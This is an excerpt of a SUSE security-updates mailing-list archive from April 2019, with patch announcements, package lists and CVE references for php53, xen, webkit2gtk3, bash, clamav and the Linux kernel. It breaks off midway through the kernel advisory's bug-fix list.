  php53-iconv-5.3.17-112.58.1
  php53-intl-5.3.17-112.58.1
  php53-json-5.3.17-112.58.1
  php53-ldap-5.3.17-112.58.1
  php53-mbstring-5.3.17-112.58.1
  php53-mcrypt-5.3.17-112.58.1
  php53-mysql-5.3.17-112.58.1
  php53-odbc-5.3.17-112.58.1
  php53-openssl-5.3.17-112.58.1
  php53-pcntl-5.3.17-112.58.1
  php53-pdo-5.3.17-112.58.1
  php53-pear-5.3.17-112.58.1
  php53-pgsql-5.3.17-112.58.1
  php53-pspell-5.3.17-112.58.1
  php53-shmop-5.3.17-112.58.1
  php53-snmp-5.3.17-112.58.1
  php53-soap-5.3.17-112.58.1
  php53-suhosin-5.3.17-112.58.1
  php53-sysvmsg-5.3.17-112.58.1
  php53-sysvsem-5.3.17-112.58.1
  php53-sysvshm-5.3.17-112.58.1
  php53-tokenizer-5.3.17-112.58.1
  php53-wddx-5.3.17-112.58.1
  php53-xmlreader-5.3.17-112.58.1
  php53-xmlrpc-5.3.17-112.58.1
  php53-xmlwriter-5.3.17-112.58.1
  php53-xsl-5.3.17-112.58.1
  php53-zip-5.3.17-112.58.1
  php53-zlib-5.3.17-112.58.1

- SUSE Linux Enterprise Point of Sale 11-SP3 (i586):
  apache2-mod_php53-5.3.17-112.58.1
  php53-5.3.17-112.58.1
  php53-bcmath-5.3.17-112.58.1
  php53-bz2-5.3.17-112.58.1
  php53-calendar-5.3.17-112.58.1
  php53-ctype-5.3.17-112.58.1
  php53-curl-5.3.17-112.58.1
  php53-dba-5.3.17-112.58.1
  php53-dom-5.3.17-112.58.1
  php53-exif-5.3.17-112.58.1
  php53-fastcgi-5.3.17-112.58.1
  php53-fileinfo-5.3.17-112.58.1
  php53-ftp-5.3.17-112.58.1
  php53-gd-5.3.17-112.58.1
  php53-gettext-5.3.17-112.58.1
  php53-gmp-5.3.17-112.58.1
  php53-iconv-5.3.17-112.58.1
  php53-intl-5.3.17-112.58.1
  php53-json-5.3.17-112.58.1
  php53-ldap-5.3.17-112.58.1
  php53-mbstring-5.3.17-112.58.1
  php53-mcrypt-5.3.17-112.58.1
  php53-mysql-5.3.17-112.58.1
  php53-odbc-5.3.17-112.58.1
  php53-openssl-5.3.17-112.58.1
  php53-pcntl-5.3.17-112.58.1
  php53-pdo-5.3.17-112.58.1
  php53-pear-5.3.17-112.58.1
  php53-pgsql-5.3.17-112.58.1
  php53-pspell-5.3.17-112.58.1
  php53-shmop-5.3.17-112.58.1
  php53-snmp-5.3.17-112.58.1
  php53-soap-5.3.17-112.58.1
  php53-suhosin-5.3.17-112.58.1
  php53-sysvmsg-5.3.17-112.58.1
  php53-sysvsem-5.3.17-112.58.1
  php53-sysvshm-5.3.17-112.58.1
  php53-tokenizer-5.3.17-112.58.1
  php53-wddx-5.3.17-112.58.1
  php53-xmlreader-5.3.17-112.58.1
  php53-xmlrpc-5.3.17-112.58.1
  php53-xmlwriter-5.3.17-112.58.1
  php53-xsl-5.3.17-112.58.1
  php53-zip-5.3.17-112.58.1
  php53-zlib-5.3.17-112.58.1

- SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ia64 ppc64 s390x x86_64):
  php53-debuginfo-5.3.17-112.58.1
  php53-debugsource-5.3.17-112.58.1

References:

https://www.suse.com/security/cve/CVE-2018-20783.html
https://www.suse.com/security/cve/CVE-2019-9020.html
https://www.suse.com/security/cve/CVE-2019-9021.html
https://www.suse.com/security/cve/CVE-2019-9023.html
https://www.suse.com/security/cve/CVE-2019-9024.html
https://www.suse.com/security/cve/CVE-2019-9637.html
https://www.suse.com/security/cve/CVE-2019-9638.html
https://www.suse.com/security/cve/CVE-2019-9639.html
https://www.suse.com/security/cve/CVE-2019-9640.html
https://www.suse.com/security/cve/CVE-2019-9641.html
https://www.suse.com/security/cve/CVE-2019-9675.html
https://bugzilla.suse.com/1126711
https://bugzilla.suse.com/1126713
https://bugzilla.suse.com/1126821
https://bugzilla.suse.com/1126823
https://bugzilla.suse.com/1127122
https://bugzilla.suse.com/1128722
https://bugzilla.suse.com/1128883
https://bugzilla.suse.com/1128886
https://bugzilla.suse.com/1128887
https://bugzilla.suse.com/1128889
https://bugzilla.suse.com/1128892

From sle-security-updates at lists.suse.com Fri Apr 5 13:22:09 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 5 Apr 2019 21:22:09 +0200 (CEST)
Subject: SUSE-SU-2019:0891-1: important: Security update for xen
Message-ID: <20190405192209.617361012B@maintenance.suse.de>

SUSE Security Update: Security update for xen
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:0891-1
Rating: important
References: #1026236 #1027519 #1069468 #1119161 #1120067 #1123157 #1126140 #1126141 #1126192 #1126195 #1126196 #1126197 #1126198 #1126201 #1126325 #1127400 #1127620 #1129623
Cross-References: CVE-2019-6778 CVE-2019-9824
Affected Products:
- SUSE Linux Enterprise Software Development Kit 12-SP4
- SUSE Linux Enterprise Server 12-SP4
- SUSE Linux Enterprise Desktop 12-SP4
______________________________________________________________________________

An update that solves two vulnerabilities and has 16 fixes is now available.

Description:

This update for xen fixes the following issues:

Security issues fixed:

- Fixed an issue which could allow malicious PV guests to cause a host crash or gain access to data pertaining to other guests. Additionally, vulnerable configurations are likely to be unstable even in the absence of an attack (bsc#1126198).
- Fixed multiple access violations introduced by the XENMEM_exchange hypercall which could allow a single PV guest to leak arbitrary amounts of memory, leading to a denial of service (bsc#1126192).
- Fixed an issue which could allow a malicious unprivileged guest userspace process to escalate its privilege to that of other userspace processes in the same guest and potentially thereby to that of the guest operating system (bsc#1126201).
- Fixed an issue which could allow malicious or buggy x86 PV guest kernels to mount a Denial of Service attack affecting the whole system (bsc#1126197).
- Fixed an issue which could allow an untrusted PV domain with access to a physical device to DMA into its own pagetables, leading to privilege escalation (bsc#1126195).
- Fixed an issue which could allow malicious or buggy x86 PV guest kernels to mount a Denial of Service attack affecting the whole system (bsc#1126196).
- CVE-2019-6778: Fixed a heap buffer overflow in tcp_emu() found in slirp (bsc#1123157).
- Fixed an issue which could allow malicious 64bit PV guests to cause a host crash (bsc#1127400).
- Fixed an issue which could allow malicious or buggy guests with passed-through PCI devices to escalate their privileges, crash the host, or access data belonging to other guests. Additionally, memory leaks were possible (bsc#1126140).
- Fixed a race condition issue which could allow malicious PV guests to escalate their privilege to that of the hypervisor (bsc#1126141).
- CVE-2019-9824: Fixed an information leak in the SLiRP networking implementation which could allow a user/process to read uninitialised stack memory contents (bsc#1129623).

Other issues addressed:

- Upstream bug fixes (bsc#1027519)
- Packages should no longer use /var/adm/fillup-templates (bsc#1069468).
- Added Xen cmdline option "suse_vtsc_tolerance" to avoid TSC emulation for HVM domUs (bsc#1026236).
- Fixed an issue where setup of grant_tables and other variables may fail (bsc#1126325).
- Fixed a building issue (bsc#1119161).
- Added a requirement for xen, xl.cfg firmware="pvgrub32|pvgrub64" (bsc#1127620).
- Fixed a segmentation fault in libvirt when a crash was triggered on top of an HVM guest (bsc#1120067).

Patch Instructions:

To install this SUSE Security Update, use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Software Development Kit 12-SP4:
  zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-891=1

- SUSE Linux Enterprise Server 12-SP4:
  zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-891=1

- SUSE Linux Enterprise Desktop 12-SP4:
  zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-891=1

Package List:

- SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 x86_64):
  xen-debugsource-4.11.1_04-2.6.1
  xen-devel-4.11.1_04-2.6.1

- SUSE Linux Enterprise Server 12-SP4 (x86_64):
  xen-4.11.1_04-2.6.1
  xen-debugsource-4.11.1_04-2.6.1
  xen-doc-html-4.11.1_04-2.6.1
  xen-libs-32bit-4.11.1_04-2.6.1
  xen-libs-4.11.1_04-2.6.1
  xen-libs-debuginfo-32bit-4.11.1_04-2.6.1
  xen-libs-debuginfo-4.11.1_04-2.6.1
  xen-tools-4.11.1_04-2.6.1
  xen-tools-debuginfo-4.11.1_04-2.6.1
  xen-tools-domU-4.11.1_04-2.6.1
  xen-tools-domU-debuginfo-4.11.1_04-2.6.1

- SUSE Linux Enterprise Desktop 12-SP4 (x86_64):
  xen-4.11.1_04-2.6.1
  xen-debugsource-4.11.1_04-2.6.1
  xen-libs-32bit-4.11.1_04-2.6.1
  xen-libs-4.11.1_04-2.6.1
  xen-libs-debuginfo-32bit-4.11.1_04-2.6.1
  xen-libs-debuginfo-4.11.1_04-2.6.1

References:

https://www.suse.com/security/cve/CVE-2019-6778.html
https://www.suse.com/security/cve/CVE-2019-9824.html
https://bugzilla.suse.com/1026236
https://bugzilla.suse.com/1027519
https://bugzilla.suse.com/1069468
https://bugzilla.suse.com/1119161
https://bugzilla.suse.com/1120067
https://bugzilla.suse.com/1123157
https://bugzilla.suse.com/1126140
https://bugzilla.suse.com/1126141
https://bugzilla.suse.com/1126192
https://bugzilla.suse.com/1126195
https://bugzilla.suse.com/1126196
https://bugzilla.suse.com/1126197
https://bugzilla.suse.com/1126198
https://bugzilla.suse.com/1126201
https://bugzilla.suse.com/1126325
https://bugzilla.suse.com/1127400
https://bugzilla.suse.com/1127620
https://bugzilla.suse.com/1129623

From sle-security-updates at lists.suse.com Fri Apr 5 13:26:02 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 5 Apr 2019 21:26:02 +0200 (CEST)
Subject: SUSE-SU-2019:0890-1: moderate: Security update for webkit2gtk3
Message-ID: <20190405192602.DD9F21012B@maintenance.suse.de>

SUSE Security Update: Security update for webkit2gtk3
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:0890-1
Rating: moderate
References: #1126768
Cross-References: CVE-2019-8375
Affected Products:
- SUSE Linux Enterprise Module for Open Buildservice Development Tools 15
- SUSE Linux Enterprise Module for Desktop Applications 15
- SUSE Linux Enterprise Module for Basesystem 15
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for webkit2gtk3 to version 2.24.0 fixes the following issue:

Security issue fixed:

- CVE-2019-8375: Fixed an issue in the UIProcess subsystem which could allow the script dialog size to exceed the web view size, leading to a buffer overflow or other unspecified impact (bsc#1126768).

Patch Instructions:

To install this SUSE Security Update, use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Module for Open Buildservice Development Tools 15:
  zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-890=1

- SUSE Linux Enterprise Module for Desktop Applications 15:
  zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-890=1

- SUSE Linux Enterprise Module for Basesystem 15:
  zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-890=1

Package List:

- SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64):
  webkit-jsc-4-2.24.0-3.21.1
  webkit-jsc-4-debuginfo-2.24.0-3.21.1
  webkit2gtk3-debugsource-2.24.0-3.21.1

- SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64):
  typelib-1_0-JavaScriptCore-4_0-2.24.0-3.21.1
  typelib-1_0-WebKit2-4_0-2.24.0-3.21.1
  typelib-1_0-WebKit2WebExtension-4_0-2.24.0-3.21.1
  webkit2gtk3-debugsource-2.24.0-3.21.1
  webkit2gtk3-devel-2.24.0-3.21.1

- SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64):
  libjavascriptcoregtk-4_0-18-2.24.0-3.21.1
  libjavascriptcoregtk-4_0-18-debuginfo-2.24.0-3.21.1
  libwebkit2gtk-4_0-37-2.24.0-3.21.1
  libwebkit2gtk-4_0-37-debuginfo-2.24.0-3.21.1
  webkit2gtk-4_0-injected-bundles-2.24.0-3.21.1
  webkit2gtk-4_0-injected-bundles-debuginfo-2.24.0-3.21.1
  webkit2gtk3-debugsource-2.24.0-3.21.1

- SUSE Linux Enterprise Module for Basesystem 15 (noarch):
  libwebkit2gtk3-lang-2.24.0-3.21.1

References:

https://www.suse.com/security/cve/CVE-2019-8375.html
https://bugzilla.suse.com/1126768

From sle-security-updates at lists.suse.com Mon Apr 8 07:10:58 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 8 Apr 2019 15:10:58 +0200 (CEST)
Subject: SUSE-SU-2019:0898-1: important: Security update for bash
Message-ID: <20190408131058.EE131F7BB@maintenance.suse.de>

SUSE Security Update: Security update for bash
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:0898-1
Rating: important
References: #1130324
Cross-References: CVE-2019-9924
Affected Products:
- SUSE Linux Enterprise Server for SAP 12-SP1
- SUSE Linux Enterprise Server 12-SP1-LTSS
- SUSE Linux Enterprise Server 12-LTSS
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for bash fixes the following issues:

Security issue fixed:

- CVE-2019-9924: Fixed a vulnerability in which the shell did not prevent the user from modifying BASH_CMDS, allowing the user to execute any command with the permissions of the shell (bsc#1130324).

Patch Instructions:

To install this SUSE Security Update, use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Server for SAP 12-SP1:
  zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-898=1

- SUSE Linux Enterprise Server 12-SP1-LTSS:
  zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-898=1

- SUSE Linux Enterprise Server 12-LTSS:
  zypper in -t patch SUSE-SLE-SERVER-12-2019-898=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (noarch):
  bash-doc-4.2-83.3.1
  readline-doc-6.2-83.3.1

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):
  bash-4.2-83.3.1
  bash-debuginfo-4.2-83.3.1
  bash-debugsource-4.2-83.3.1
  libreadline6-32bit-6.2-83.3.1
  libreadline6-6.2-83.3.1
  libreadline6-debuginfo-32bit-6.2-83.3.1
  libreadline6-debuginfo-6.2-83.3.1

- SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64):
  bash-4.2-83.3.1
  bash-debuginfo-4.2-83.3.1
  bash-debugsource-4.2-83.3.1
  libreadline6-6.2-83.3.1
  libreadline6-debuginfo-6.2-83.3.1

- SUSE Linux Enterprise Server 12-SP1-LTSS (s390x x86_64):
  libreadline6-32bit-6.2-83.3.1
  libreadline6-debuginfo-32bit-6.2-83.3.1

- SUSE Linux Enterprise Server 12-SP1-LTSS (noarch):
  bash-doc-4.2-83.3.1
  readline-doc-6.2-83.3.1

- SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64):
  bash-4.2-83.3.1
  bash-debuginfo-4.2-83.3.1
  bash-debugsource-4.2-83.3.1
  libreadline6-6.2-83.3.1
  libreadline6-debuginfo-6.2-83.3.1

- SUSE Linux Enterprise Server 12-LTSS (s390x x86_64):
  libreadline6-32bit-6.2-83.3.1
  libreadline6-debuginfo-32bit-6.2-83.3.1

- SUSE Linux Enterprise Server 12-LTSS (noarch):
  bash-doc-4.2-83.3.1
  readline-doc-6.2-83.3.1

References:

https://www.suse.com/security/cve/CVE-2019-9924.html
https://bugzilla.suse.com/1130324

From sle-security-updates at lists.suse.com Mon Apr 8 07:11:41 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 8 Apr 2019 15:11:41 +0200 (CEST)
Subject: SUSE-SU-2019:0897-1: important: Security update for clamav
Message-ID: <20190408131141.91C9FF7BB@maintenance.suse.de>

SUSE Security Update: Security update for clamav
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:0897-1
Rating: important
References: #1130721
Cross-References: CVE-2019-1787 CVE-2019-1788 CVE-2019-1789
Affected Products:
- SUSE OpenStack Cloud 7
- SUSE Linux Enterprise Server for SAP 12-SP2
- SUSE Linux Enterprise Server for SAP 12-SP1
- SUSE Linux Enterprise Server 12-SP4
- SUSE Linux Enterprise Server 12-SP3
- SUSE Linux Enterprise Server 12-SP2-LTSS
- SUSE Linux Enterprise Server 12-SP2-BCL
- SUSE Linux Enterprise Server 12-SP1-LTSS
- SUSE Linux Enterprise Server 12-LTSS
- SUSE Linux Enterprise Desktop 12-SP4
- SUSE Linux Enterprise Desktop 12-SP3
- SUSE Enterprise Storage 4
______________________________________________________________________________

An update that fixes three vulnerabilities is now available.

Description:

This update for clamav to version 0.100.3 fixes the following issues:

Security issues fixed (bsc#1130721):

- CVE-2019-1787: Fixed an out-of-bounds heap read condition which may occur when scanning PDF documents.
- CVE-2019-1789: Fixed an out-of-bounds heap read condition which may occur when scanning PE files (i.e. Windows EXE and DLL files).
- CVE-2019-1788: Fixed an out-of-bounds heap write condition which may occur when scanning OLE2 files such as Microsoft Office 97-2003 documents.

Patch Instructions:

To install this SUSE Security Update, use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE OpenStack Cloud 7:
  zypper in -t patch SUSE-OpenStack-Cloud-7-2019-897=1

- SUSE Linux Enterprise Server for SAP 12-SP2:
  zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-897=1

- SUSE Linux Enterprise Server for SAP 12-SP1:
  zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-897=1

- SUSE Linux Enterprise Server 12-SP4:
  zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-897=1

- SUSE Linux Enterprise Server 12-SP3:
  zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-897=1

- SUSE Linux Enterprise Server 12-SP2-LTSS:
  zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-897=1

- SUSE Linux Enterprise Server 12-SP2-BCL:
  zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-897=1

- SUSE Linux Enterprise Server 12-SP1-LTSS:
  zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-897=1

- SUSE Linux Enterprise Server 12-LTSS:
  zypper in -t patch SUSE-SLE-SERVER-12-2019-897=1

- SUSE Linux Enterprise Desktop 12-SP4:
  zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-897=1

- SUSE Linux Enterprise Desktop 12-SP3:
  zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-897=1

- SUSE Enterprise Storage 4:
  zypper in -t patch SUSE-Storage-4-2019-897=1

Package List:

- SUSE OpenStack Cloud 7 (s390x x86_64):
  clamav-0.100.3-33.21.1
  clamav-debuginfo-0.100.3-33.21.1
  clamav-debugsource-0.100.3-33.21.1

- SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64):
  clamav-0.100.3-33.21.1
  clamav-debuginfo-0.100.3-33.21.1
  clamav-debugsource-0.100.3-33.21.1

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):
  clamav-0.100.3-33.21.1
clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 - SUSE Enterprise Storage 4 (x86_64): clamav-0.100.3-33.21.1 clamav-debuginfo-0.100.3-33.21.1 clamav-debugsource-0.100.3-33.21.1 References: https://www.suse.com/security/cve/CVE-2019-1787.html https://www.suse.com/security/cve/CVE-2019-1788.html https://www.suse.com/security/cve/CVE-2019-1789.html https://bugzilla.suse.com/1130721 From sle-security-updates at lists.suse.com Mon Apr 8 07:12:22 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 8 Apr 2019 15:12:22 +0200 (CEST) Subject: SUSE-SU-2019:0901-1: important: Security update for the Linux Kernel Message-ID: <20190408131222.383B0F7BB@maintenance.suse.de> SUSE Security Update: Security update for the 
Linux Kernel ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0901-1 Rating: important References: #1012382 #1020413 #1023175 #1031492 #1042286 #1050549 #1065600 #1070767 #1075697 #1078355 #1082943 #1086095 #1086652 #1087036 #1087092 #1090435 #1094823 #1099810 #1102875 #1102877 #1102879 #1102882 #1102896 #1102959 #1103429 #1105428 #1106061 #1106105 #1106929 #1107866 #1109137 #1109248 #1109695 #1114893 #1116345 #1116653 #1117108 #1117645 #1117744 #1119019 #1119680 #1119843 #1120017 #1120691 #1120722 #1120758 #1120902 #1121713 #1121726 #1121805 #1122650 #1122651 #1122779 #1122885 #1123321 #1123323 #1123357 #1123933 #1124166 #1124235 #1124728 #1124732 #1124735 #1124775 #1124777 #1124780 #1124811 #1125000 #1125014 #1125315 #1125446 #1125794 #1125796 #1125808 #1125809 #1125810 #1125892 #1126389 #1126772 #1126773 #1126805 #1127082 #1127155 #1127561 #1127725 #1127731 #1127961 #1128166 #1128452 #1128565 #1128696 #1128756 #1128893 #1129080 #1129179 #1129237 #1129238 #1129239 #1129240 #1129241 #1129413 #1129414 #1129415 #1129416 #1129417 #1129418 #1129419 #1129581 #1129770 #1129923 Cross-References: CVE-2017-18249 CVE-2019-2024 CVE-2019-3459 CVE-2019-3460 CVE-2019-6974 CVE-2019-7221 CVE-2019-7222 CVE-2019-9213 Affected Products: SUSE Linux Enterprise Server 12-SP3 ______________________________________________________________________________ An update that solves 8 vulnerabilities and has 102 fixes is now available. Description: The SUSE Linux Enterprise 12 SP3 Azure kernel was updated to 4.4.176 to receive various security and bugfixes. The following security bugs were fixed: - CVE-2019-2024: A use-after-free when disconnecting a source was fixed which could lead to crashes. bnc#1129179). - CVE-2019-9213: expand_downwards in mm/mmap.c lacked a check for the mmap minimum address, which made it easier for attackers to exploit kernel NULL pointer dereferences on non-SMAP platforms. 
This is related to a capability check for the wrong task (bnc#1128166). - CVE-2019-6974: kvm_ioctl_create_device in virt/kvm/kvm_main.c mishandled reference counting because of a race condition, leading to a use-after-free. (bnc#1124728) - CVE-2019-3459, CVE-2019-3460: The Bluetooth stack suffered from two remote information leak vulnerabilities in the code that handles incoming L2cap configuration packets (bsc#1120758). - CVE-2019-7221: Fixed a use-after-free vulnerability in the KVM hypervisor related to the emulation of a preemption timer, allowing an guest user/process to crash the host kernel. (bsc#1124732). - CVE-2019-7222: Fixed an information leakage in the KVM hypervisor related to handling page fault exceptions, which allowed a guest user/process to use this flaw to leak the host's stack memory contents to a guest (bsc#1124735). - CVE-2017-18249: The add_free_nid function in fs/f2fs/node.c did not properly track an allocated nid, which allowed local users to cause a denial of service (race condition) or possibly have unspecified other impact via concurrent threads (bnc#1087036). The following non-security bugs were fixed: - acpi/nfit: Block function zero DSMs (bsc#1123321). - acpi, nfit: Fix ARS overflow continuation (bsc#1125000). - acpi/nfit: fix cmd_rc for acpi_nfit_ctl to always return a value (bsc#1124775). - acpi/nfit: Fix command-supported detection (bsc#1123323). - acpi: power: Skip duplicate power resource references in _PRx (bnc#1012382). - acpi / processor: Fix the return value of acpi_processor_ids_walk() (git fixes (acpi)). - alpha: Fix Eiger NR_IRQS to 128 (bnc#1012382). - alpha: fix page fault handling for r16-r18 targets (bnc#1012382). - alsa: bebob: fix model-id of unit for Apogee Ensemble (bnc#1012382). - alsa: compress: Fix stop handling on compressed capture streams (bnc#1012382). - alsa: hda - Add quirk for HP EliteBook 840 G5 (bnc#1012382). - alsa: hda/realtek - Disable headset Mic VREF for headset mode of ALC225 (bnc#1012382). 
- alsa: hda - Serialize codec registrations (bnc#1012382).
- alsa: usb-audio: Fix implicit fb endpoint setup by quirk (bnc#1012382).
- ARC: perf: map generic branches to correct hardware condition (bnc#1012382).
- arm64: Do not trap host pointer auth use to EL2 (bnc#1012382).
- arm64: ftrace: do not adjust the LR value (bnc#1012382).
- arm64: hyp-stub: Forbid kprobing of the hyp-stub (bnc#1012382).
- arm64/kvm: consistently handle host HCR_EL2 flags (bnc#1012382).
- arm64: KVM: Skip MMIO insn after emulation (bnc#1012382).
- arm64: perf: set suppress_bind_attrs flag to true (bnc#1012382).
- ARM: 8808/1: kexec:offline panic_smp_self_stop CPU (bnc#1012382).
- ARM: cns3xxx: Fix writing to wrong PCI config registers after alignment (bnc#1012382).
- ARM: dts: da850-evm: Correct the sound card name (bnc#1012382).
- ARM: dts: Fix OMAP4430 SDP Ethernet startup (bnc#1012382).
- ARM: dts: kirkwood: Fix polarity of GPIO fan lines (bnc#1012382).
- ARM: dts: mmp2: fix TWSI2 (bnc#1012382).
- ARM: iop32x/n2100: fix PCI IRQ mapping (bnc#1012382).
- ARM: OMAP2+: hwmod: Fix some section annotations (bnc#1012382).
- ARM: pxa: avoid section mismatch warning (bnc#1012382).
- ASoC: atom: fix a missing check of snd_pcm_lib_malloc_pages (bnc#1012382).
- ASoC: fsl: Fix SND_SOC_EUKREA_TLV320 build error on i.MX8M (bnc#1012382).
- ASoC: Intel: mrfld: fix uninitialized variable access (bnc#1012382).
- ata: Fix racy link clearance (bsc#1107866).
- ax25: fix possible use-after-free (bnc#1012382).
- batman-adv: Avoid WARN on net_device without parent in netns (bnc#1012382).
- batman-adv: Force mac header to start of data on xmit (bnc#1012382).
- block_dev: fix crash on chained bios with O_DIRECT (bsc#1090435).
- block: do not use bio->bi_vcnt to figure out segment number (bsc#1128893).
- block/loop: Use global lock for ioctl() operation (bnc#1012382).
- block/swim3: Fix -EBUSY error when re-opening device after unmount (Git-fixes).
- bluetooth: Fix unnecessary error message for HCI request completion (bnc#1012382).
- bnxt_re: Fix couple of memory leaks that could lead to IOMMU call traces (bsc#1020413).
- bnxt_re: Fix couple of memory leaks that could lead to IOMMU call traces (bsc#1020413).
- bpf: fix replace_map_fd_with_map_ptr's ldimm64 second imm field (bsc#1012382).
- btrfs: ensure that a DUP or RAID1 block group has exactly two stripes (bsc#1128452).
- btrfs: tree-checker: Check level for leaves and nodes (bnc#1012382).
- btrfs: tree-checker: Do not check max block group size as current max chunk size limit is unreliable (fixes for bnc#1012382 bsc#1102875 bsc#1102877 bsc#1102879 bsc#1102882 bsc#1102896).
- btrfs: tree-checker: Fix misleading group system information (bnc#1012382).
- btrfs: tree-check: reduce stack consumption in check_dir_item (bnc#1012382).
- btrfs: validate type when reading a chunk (bnc#1012382).
- btrfs: wait on ordered extents on abort cleanup (bnc#1012382).
- can: bcm: check timer values before ktime conversion (bnc#1012382).
- can: dev: __can_get_echo_skb(): fix bogous check for non-existing skb by removing it (bnc#1012382).
- can: gw: ensure DLC boundaries after CAN frame modification (bnc#1012382).
- ceph: avoid repeatedly adding inode to mdsc->snap_flush_list (bsc#1126773).
- ceph: clear inode pointer when snap realm gets dropped by its inode (bsc#1125809).
- ch: add missing mutex_lock()/mutex_unlock() in ch_release() (bsc#1124235).
- char/mwave: fix potential Spectre v1 vulnerability (bnc#1012382).
- ch: fixup refcounting imbalance for SCSI devices (bsc#1124235).
- cifs: Always resolve hostname before reconnecting (bnc#1012382).
- cifs: check ntwrk_buf_start for NULL before dereferencing it (bnc#1012382).
- cifs: Do not count -ENODATA as failure for query directory (bnc#1012382).
- cifs: Do not hide EINTR after sending network packets (bnc#1012382).
- cifs: Fix possible hang during async MTU reads and writes (bnc#1012382).
- cifs: Fix potential OOB access of lock element array (bnc#1012382).
- cifs: Limit memory used by lock request calls to a page (bnc#1012382).
- clk: imx6q: reset exclusive gates on init (bnc#1012382).
- clk: imx6sl: ensure MMDC CH0 handshake is bypassed (bnc#1012382).
- copy_mount_string: Limit string length to PATH_MAX (bsc#1082943).
- cpufreq: intel_pstate: Fix HWP on boot CPU after system resume (bsc#1120017).
- cpuidle: big.LITTLE: fix refcount leak (bnc#1012382).
- crypto: authencesn - Avoid twice completion call in decrypt path (bnc#1012382).
- crypto: authenc - fix parsing key with misaligned rta_len (bnc#1012382).
- crypto: cts - fix crash on short inputs (bnc#1012382).
- crypto: user - support incremental algorithm dumps (bsc#1120902).
- crypto: ux500 - Use proper enum in cryp_set_dma_transfer (bnc#1012382).
- crypto: ux500 - Use proper enum in hash_set_dma_transfer (bnc#1012382).
- cw1200: Fix concurrency use-after-free bugs in cw1200_hw_scan() (bnc#1012382).
- dccp: fool proof ccid_hc_[rt]x_parse_options() (bnc#1012382).
- debugfs: fix debugfs_rename parameter checking (bnc#1012382).
- device property: Fix the length used in PROPERTY_ENTRY_STRING() (bsc#1129770).
- Disable MSI also when pcie-octeon.pcie_disable on (bnc#1012382).
